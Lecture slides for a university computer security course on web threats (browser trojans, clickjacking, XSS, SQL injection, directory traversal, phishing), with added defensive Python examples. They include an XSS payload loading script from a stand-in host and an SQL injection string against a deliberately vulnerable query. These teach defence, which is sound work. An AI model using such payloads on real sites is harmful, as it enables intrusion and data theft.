CSIT561 Module6 Web Security (1)

The document discusses various web security threats including attacks on browsers, fake websites, and injection attacks. It highlights the importance of authentication and countermeasures to protect against these vulnerabilities. Additionally, it emphasizes the need for user education and effective spam filters to combat phishing and other malicious activities.


1

CSIT 561 – COMPUTER SECURITY


MODULE 6 : WEB SECURITY

Bharath K. Samanthula
Department of Computer Science
Montclair State University

Slides are adapted from Chapter 12, Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043).
2

Objectives
• Attacks against browsers
• Fake and malicious websites
• Attacks targeting sensitive data
• Injection attacks
• Spam
• Phishing attacks

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
3

Browser Vulnerabilities

[Bar chart: number of browser vulnerabilities reported per year, 2008–2013; bar values 208, 207, 441, 731, 727 and 897.]

4

Browser Attack Types

• Man-in-the-browser
  • Trojan horse that intercepts data passing via the browser
  • Example: Symantec researchers identified a Trojan horse called SilentBanker (2008)
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle
5

Man-in-the-Browser

[Diagram: the user types into the browser, the browser encrypts the data, and the encrypted data is transferred to the BANK; SilentBanker, sitting inside the browser, intercepts the keystrokes before they are encrypted.]

SilentBanker was a Trojan that generally installed as a browser plug-in. When it detected the user going to a banking URL, it would intercept keystrokes and even modify them so that money transfers would go to attackers’ accounts.
6

Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a USB
port or can masquerade as a keyboard
• May also be installed as malware
• Not limited to browsers

7

Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input

8

Program Download Substitution


• Attacker creates a page with seemingly
innocuous and desirable programs for download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware

9

User-in-the-Middle
• CAPTCHAs are used by websites to defeat automation, such as by preventing spammers from scripting the creation of massive numbers of email accounts. By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale.
• Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf
• Petmail (http://petmail.lothar.com) is an anti-spam email system, but is still susceptible to attacks such as a man-in-the-middle attack

10

Successful Authentication
• The attacks listed above are largely failures of authentication
• Can be mitigated with
  • Shared secret – known only to the communicating parties
    • Security question, time of last login, etc.
  • One-time password
    • RSA SecurID tokens discussed earlier
  • Out-of-band communication
    • Transferring one fact along a communication path separate from that of another fact
    • PINs delivered separately from the bank card mail

11

Fake Website

12

Fake Code

13

Protecting Web Sites Against Change

• Integrity checksums
  • Generate a hash value for each code or data item placed on the server
  • Admins compare the new and original hashes to determine whether any changes have occurred
  • Tripwire program: a well-known integrity-checking tool
• Digital signatures for client-side assurance
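The integrity-checksum idea above, worked through as an added example (not code from the slides or from Tripwire): hash every file under a web root to build a baseline, then compare a later run against it. The directory layout and file names are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_file(path):
    """SHA-256 of one file, read in chunks so large assets are not loaded whole."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Hash every file under the web root; this is the admin's 'original hashes' record."""
    root = Path(root)
    return {str(p.relative_to(root)): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(baseline, current):
    """Report changed, added and removed files between two baseline dictionaries."""
    modified = sorted(f for f in baseline if f in current and baseline[f] != current[f])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return {"modified": modified, "added": added, "removed": removed}


def demo():
    """Constructed scenario: record a baseline, then alter one page and add an undeployed file."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "js").mkdir()
        (root / "index.html").write_text("<h1>Welcome</h1>")
        (root / "js" / "app.js").write_text("console.log('ok');")
        baseline = build_baseline(root)                       # taken at deployment time
        (root / "index.html").write_text("<h1>Defaced</h1>")  # content change
        (root / "extra.html").write_text("unexpected")        # file that was never deployed
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

A real deployment keeps the baseline off the web server (or signed), since an attacker who can alter the content can otherwise alter the recorded hashes too.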

14

Tracking Bug

[Diagram: visits from 200.100.1.10 to a Florist site and to a Bakery site each load a web bug from ClicksRUs, which correlates the two visits and serves a targeted ad.]

A tiny image served up from one provider (“ClicksRUs”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. Web bugs can also be used to track users’ reading of advertising emails.

15

Clickjacking
• Clickjacking is a way of tricking users into providing
desired input.
• The attacker makes the input dialog transparent and
places an image with an enticement below the
transparent dialog. The user ends up answering a
question he didn’t even know he was being asked,
unknowingly authorizing his computer to execute the
attacker’s will. “Framing”—moving and layering HTML
iframes—is an important component of this attack.

16

Clickjacking

[Diagram: a transparent dialog reading “Do you want to perform this dangerous act? [Yes] [No]” is layered over a visible page reading “For a Free Prize Click [Here]”, so that the user’s click on “Here” lands on “Yes”.]

17

Facebook Clickjack Attack

• In summer 2010, Facebook users were tricked into posting that they liked a particular site.
  • Victims tried to click on links that many of their friends liked, related to a World Cup tennis match
  • Another message popped up asking them to confirm they were over age 18
  • What the victims did not see: an invisible box asking them to confirm they liked the target website

18

Drive-By Download
• Code is downloaded, installed, and executed on a computer without the user’s knowledge
• May be the result of clickjacking, fake code, program download substitution, etc.

Unwanted browser toolbars are an example that just about every student will have had experience with.

19

Cross-Site Scripting (XSS)

• Tricking a client or server into executing scripted code by including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like user inputs, so they can take over web pages similarly to the way buffer overflow attacks can take over programs

Cool<br>story.<br>KCTVBigFan<script src=http://badsite.com/xss.js></script>

20

XSS

21

SQL Injection
• Injecting SQL code into an exchange between an application and its database server
• Example:
  • Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input field:
    QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + "';"
  • The same query with malicious user input (acctNum = 2468' OR '1'='1):
    QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1';"
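The slide's query run both ways, as an added example (not from the textbook): the string-built form against the slide's payload returns every account's transactions, while a parameterized query treats the same input as a literal account number. The table contents are constructed, in an in-memory SQLite database.

```python
import sqlite3


def make_db():
    """Constructed sample 'trans' table with transactions for three accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trans (id INTEGER PRIMARY KEY, acct TEXT, amount REAL)")
    conn.executemany("INSERT INTO trans (acct, amount) VALUES (?, ?)",
                     [("2468", 10.0), ("2468", 25.5), ("1357", 999.0), ("9999", 3.0)])
    return conn


def lookup_vulnerable(conn, acct_num):
    """The slide's pattern: the user-supplied value is spliced into the SQL text."""
    query = "SELECT * FROM trans WHERE acct = '" + acct_num + "';"
    return conn.execute(query).fetchall()


def lookup_safe(conn, acct_num):
    """Parameterized query: the driver passes acct_num as data, so it is never parsed as SQL."""
    return conn.execute("SELECT * FROM trans WHERE acct = ?;", (acct_num,)).fetchall()


def demo():
    """Row counts for an honest account number and for the slide's malicious input."""
    conn = make_db()
    honest = "2468"
    malicious = "2468' OR '1'='1"   # closes the quote and appends a tautology, as on the slide
    return {
        "vuln_honest": len(lookup_vulnerable(conn, honest)),
        "vuln_malicious": len(lookup_vulnerable(conn, malicious)),
        "safe_honest": len(lookup_safe(conn, honest)),
        "safe_malicious": len(lookup_safe(conn, malicious)),
    }


if __name__ == "__main__":
    print(demo())
```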

22

Dot-Dot-Slash
• Also known as “directory traversal,” this is when attackers
use the term “../” to access files that are on the target web
server but not meant to be accessed from outside
• Most commonly entered into the URL bar but may also be
combined with other attacks, such as XSS

23

Server-Side Include (SSI)


• SSI is an interpreted server-side scripting language that
can be used for basic web server directives, such as
including files and executing commands
• As is the case with XSS, some websites are vulnerable to
allowing users to execute SSI directives through text input

24

Countermeasures to Injections
• Filter and sanitize all user input
• Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user
inputs—trust nothing, check everything
• Use access control mechanisms on backend servers,
such as “stored procedures”
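An added example (not from the slides) that ties the Dot-Dot-Slash slide to the "account for every potentially valid encoding" countermeasure: a request path is percent-decoded until it stops changing, checked for NUL bytes, normalized, and only accepted if it still lies under the web root. The document root /var/www/html is an assumed value.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root for this example


def fully_decode(raw, max_rounds=3):
    """Percent-decode until stable, so a double-encoded '%252e%252e/' is seen as '../'."""
    s = raw
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            return s
        s = decoded
    raise ValueError("too many encoding layers")


def resolve_under_root(requested, root=WEB_ROOT):
    """Map a requested URL path to a filesystem path; reject anything outside the web root."""
    decoded = fully_decode(requested)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")          # treat backslashes as separators too
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        raise ValueError("path escapes web root: " + full)
    return full


def is_allowed(requested):
    """True if the request maps to a location inside the web root."""
    try:
        resolve_under_root(requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ["/images/logo.png", "../../private/keys.txt", "%2e%2e/%2e%2e/private/keys.txt"]:
        print(p, "->", "allowed" if is_allowed(p) else "rejected")
```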

25

Email Spam
• Experts estimate that 60% to 90% of all email is spam
• Types of spam:
• Advertising
• Pharmaceuticals
• Stocks
• Malicious code
• Links for malicious websites
• Spam countermeasures
• Laws against spam exist but are generally ineffective
• CAN-SPAM act in US and Directive 2002/58/EC of the EU
• Email filters have become very effective for most spam
• Internet service providers use volume limitations to make
spammers’ jobs more difficult
26

Phishing
• A message that tries to trick a victim into providing private
information or taking some other unsafe action
• Spear phishing: A targeted attack that is personalized to a
particular recipient or set of recipients

27

Countermeasures
• User education
• Limited effectiveness and very subject to co-evolution with attacks
• PGP and S/MIME
• Cryptographic solutions that have seen very limited adoption after
years on the market

28

PGP
Developed by Phil Zimmermann in 1991
Performs some or all of the following steps
1. Create a random session key for symmetric algorithm
2. Encrypt the message, using session key (for message
confidentiality)
3. Encrypt the session key under the recipient's public key
4. Generate hash value of the message and digitally sign it
using sender’s private key (for message integrity and
authenticity)
5. Attach the encrypted session key to the encrypted message
and digest
6. Transmit the message to the recipient
The recipient reverses the above steps to retrieve and validate
the message
29

Summary
• As web browsers have become a primary focus of users
and taken on greater functionality, they’ve become a focus
of many types of attack
• Browser and website weaknesses are often the result of
some form of poor authentication
• Many attackers focus on tricking users with fake websites,
misleading applications, and phishing emails
• On the server side, injection attacks are a key concern,
and countermeasures to prevent them are critical
